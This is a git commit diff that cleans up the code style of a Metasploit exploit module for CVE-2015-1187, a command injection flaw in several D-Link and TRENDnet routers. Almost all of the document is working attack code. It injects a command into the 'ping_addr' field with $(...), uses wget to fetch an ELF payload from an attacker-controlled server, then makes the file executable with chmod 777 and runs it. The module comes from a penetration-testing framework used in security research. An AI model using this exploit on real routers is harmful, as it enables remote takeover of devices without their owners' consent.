Do code cleanup

jvazquez-r7 · jvazquez-r7 · commit ad465c4d5b4d · 2015-04-15T09:10:18.000-05:00
diff --git a/modules/exploits/linux/http/multi_ncc_ping_exec.rb b/modules/exploits/linux/http/multi_ncc_ping_exec.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = ManualRanking  #only tested in emulated environment
+  Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer::HTML
@@ -17,38 +17,32 @@ def initialize(info = {})
     super(update_info(info,
       'Name'           => 'D-Link/TRENDnet NCC Command Injection (ping.ccp)',
       'Description'    => %q{
-        This module exploits a remote command injection vulnerability on several routers.
-        This module was tested in an emulated environment of a DIR-626L only. Several
-        D-Link and TRENDnet devices are reported as affected:
-        D-Link DIR-626L (Rev A) - v1.04b04,
-        D-Link DIR-636L (Rev A) - v1.04,
-        D-Link DIR-808L (Rev A) - v1.03b05,
-        D-Link DIR-810L (Rev A) - v1.01b04,
-        D-Link DIR-810L (Rev B) - v2.02b01,
-        D-Link DIR-820L (Rev A) - v1.02B10,
-        D-Link DIR-820L (Rev A) - v1.05B03,
-        D-Link DIR-820L (Rev B) - v2.01b02,
-        D-Link DIR-826L (Rev A) - v1.00b23,
-        D-Link DIR-830L (Rev A) - v1.00b07,
-        D-Link DIR-836L (Rev A) - v1.01b03,
-        TRENDnet TEW-731BR (Rev 2) - v2.01b01
+        This module exploits a remote command injection vulnerability on several routers. This
+        module was tested in an emulated environment of a DIR-626L only. Several D-Link and
+        TRENDnet devices are reported as affected: D-Link DIR-626L (Rev A) v1.04b04, D-Link
+        DIR-636L (Rev A) v1.04, D-Link DIR-808L (Rev A) v1.03b05, D-Link DIR-810L (Rev A) v1.01b04,
+        D-Link DIR-810L (Rev B) v2.02b01, D-Link DIR-820L (Rev A) v1.02B10, D-Link DIR-820L (Rev A)
+        v1.05B03, D-Link DIR-820L (Rev B) v2.01b02, D-Link DIR-826L (Rev A) v1.00b23, D-Link
+        DIR-830L (Rev A) v1.00b07, D-Link DIR-836L (Rev A) v1.01b03, TRENDnet TEW-731BR (Rev 2)
+        v2.01b01
       },
       'Author'         =>
         [
           'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery and initial PoC
           'Tiago Caetano Henriques', # Vulnerability discovery and initial PoC
-          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
           ['CVE', '2015-1187'],
           ['BID', '72816'],
-          ['URL', 'https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2'], #advisory with PoC
-          ['URL', 'http://seclists.org/fulldisclosure/2015/Mar/15'], #advisory with PoC
-          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052'] #vendor site with update
+          ['URL', 'https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2'],
+          ['URL', 'http://seclists.org/fulldisclosure/2015/Mar/15'],
+          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052']
         ],
       'Targets'        =>
+        # Only tested on D-Link DIR-626L where wget is available
         [
           [ 'Linux mipsel Payload',
             {
@@ -83,7 +77,7 @@ def check
       })
 
       # unknown if other devices also using mini_httpd
-      if res && [500].include?(res.code) && res.headers["Server"] && res.headers["Server"] =~ /mini_httpd/
+      if res && [500].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
         return Exploit::CheckCode::Detected
       end
     rescue ::Rex::ConnectionError
@@ -93,15 +87,15 @@ def check
     Exploit::CheckCode::Unknown
   end
 
-  def exec_command(cmd, timeout=20)
+  def exec_command(cmd, timeout = 20)
     begin
       res = send_request_cgi({
         'method' => 'POST',
         'uri'    => normalize_uri(target_uri.path),
         'encode_params' => false,
         'vars_post' => {
-          "ccp_act" => "ping_v6",
-          "ping_addr" => '$(' + cmd + ')'
+          'ccp_act' => 'ping_v6',
+          'ping_addr' => '$(' + cmd + ')'
         }
       }, timeout)
       return res
@@ -119,21 +113,22 @@ def exploit
     print_status("#{peer} - Accessing the vulnerable URL...")
 
     unless check == Exploit::CheckCode::Detected
-      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+      fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
     end
 
     print_status("#{peer} - Exploiting...")
 
     @pl = generate_payload_exe
+    @payload_url  = ''
+    @dropped_elf = rand_text_alpha(rand(5) + 3)
 
     if @pl.blank?
       fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
     end
-    @payload_url  = ""
 
     if datastore['EXTURL'].blank?
       begin
-        Timeout.timeout(datastore['HTTPDELAY']) {super}
+        Timeout.timeout(datastore['HTTPDELAY']) { super }
       rescue Timeout::Error
       end
       chmod_payload
@@ -147,57 +142,51 @@ def exploit
   end
 
   def wget_payload
-    #
-    # download payload
-    #
-    print_status("#{peer} - Downloading the payload to the target machine...")
+    upload_path = File.join(datastore['WRITABLEDIR'], @dropped_elf)
 
-    @dropped_elf = rand_text_alpha(rand(5) + 3)
+    cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{upload_path}"
 
-    cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
+    print_status("#{peer} - Downloading the payload to the target machine...")
     res = exec_command(cmd)
-    if res && [200].include?(res.code) && res.headers["Server"] && res.headers["Server"] =~ /mini_httpd/
-      register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf))
+
+    if res && [200].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
+      register_files_for_cleanup(upload_path)
     else
       fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
     end
   end
 
   def chmod_payload
-    #
-    # chmod
-    #
     cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
-    print_status("#{peer} - chmod the payload...")
 
+    print_status("#{peer} - chmod the payload...")
     res = exec_command(cmd, 1)
-    if (!res)
+
+    unless res
       fail_with(Failure::Unknown, "#{peer} - Unable to chmod payload")
     end
 
-    select(nil, nil, nil, 1)
+    Rex.sleep(1)
   end
 
   def exec_payload
-    #
-    # execute
-    #
     cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf)
-    print_status("#{peer} - Executing the payload...")
 
+    print_status("#{peer} - Executing the payload...")
     res = exec_command(cmd, 1)
-    if (!res)
+
+    unless res
       fail_with(Failure::Unknown, "#{peer} - Unable to exec payload")
     end
 
-    select(nil, nil, nil, 1)
+    Rex.sleep(1)
   end
 
-  # Handle incoming requests from the server
+  # Handle incoming requests to the HTTP server
   def on_request_uri(cli, request)
     print_status("Request: #{request.uri}")
     if request.uri =~ /#{Regexp.escape(get_resource)}/
-      print_status("Sending payload...")
+      print_status('Sending payload...')
       send_response(cli, @pl)
     end
   end
